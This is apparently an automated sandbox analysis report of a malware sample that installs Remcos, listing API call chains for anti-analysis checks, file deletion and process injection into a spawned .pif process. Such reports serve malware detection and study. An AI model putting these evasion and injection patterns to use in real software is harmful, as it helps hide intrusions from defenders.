              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040F7A7 Sleep,ExitProcess,6_1_0040F7A7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040F7A7 Sleep,ExitProcess,10_1_0040F7A7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,6_1_0041A748
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,10_1_0041A748
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Evaded block: after key decision (graph_6-47456)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Evaded block: after key decision (graph_6-47481)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Evaded block: after key decision (3 identical entries)
              Source: C:\ProgramData\Remcos\remcos.exe Evasive API call chain: GetLocalTime, DecisionNodes (graph_7-6685)
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif API coverage: 6.4 %
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif API coverage: 6.3 %
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe Code function: 0_2_02D658CC GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_02D658CC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,6_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,6_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,6_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0044E879 FindFirstFileExA,6_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,6_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040783C FindFirstFileW,FindNextFileW,6_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,6_1_00419AF5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,6_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 6_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,6_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 7_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,7_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exe Code function: 7_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,7_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409253
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_1_0041C291
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_1_0040C34D
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_1_00409665
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0044E879 FindFirstFileExA,10_1_0044E879
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_1_0040880C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040783C FindFirstFileW,FindNextFileW,10_1_0040783C
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,10_1_00419AF5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_1_0040BB30
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif Code function: 10_1_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_1_0040BD37
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,12_2_0040128D
              Source: C:\ProgramData\Remcos\remcos.exeCode function: 12_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,12_2_00401612
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,6_1_00407C97
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(0o%SystemRoot%\system32\mswsock.dll
              Source: udVh4Ist4Z.exe, 00000000.00000002.2140385254.00000000006E4000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.0000000000902000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 00000008.00000003.2293558943.00000000008D0000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.0000000000726000.00000004.00000020.00020000.00000000.sdmp, Xjfxsfmn.PIF, 0000000F.00000003.2559378885.00000000006F6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeAPI call chain: ExitProcess graph end nodegraph_0-38658
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end nodegraph_7-6683
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end nodegraph_7-6679
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\Remcos\remcos.exeAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIFAPI call chain: ExitProcess graph end node
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_004349F9
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exeCode function: 0_2_02D77AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_02D77AC0
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004432B5 mov eax, dword ptr fs:[00000030h]6_1_004432B5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004432B5 mov eax, dword ptr fs:[00000030h]10_1_004432B5
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00412077 GetProcessHeap,HeapFree,6_1_00412077
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_004349F9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00434B47 SetUnhandledExceptionFilter,6_1_00434B47
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_1_0043BB22
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 6_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_1_00434FDC
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_004349F9
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00434B47 SetUnhandledExceptionFilter,10_1_00434B47
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,10_1_0043BB22
              Source: C:\Users\Public\Libraries\nmfsxfjX.pifCode function: 10_1_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,10_1_00434FDC

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 1E060000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 1E060000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory allocated: C:\Users\Public\Libraries\nmfsxfjX.pif base: 18100000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Section unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Section unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Section unmapped: C:\Users\Public\Libraries\nmfsxfjX.pif base address: 400000
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Memory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 2CD008
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 218008
              Source: C:\Users\Public\Libraries\Xjfxsfmn.PIF | Memory written: C:\Users\Public\Libraries\nmfsxfjX.pif base: 370008
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 6_1_004120F7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 10_1_004120F7
              Source: C:\Users\Public\Libraries\nmfsxfjX.pif | Code function: 6_1_00419627 mouse_event | 6_1_00419627
              Source: C:\Users\user\Desktop\udVh4Ist4Z.exe | Process created: C:\Users\Public\Libraries\nmfsxfjX.pif C:\Users\Public\Libraries\nmfsxfjX.pif
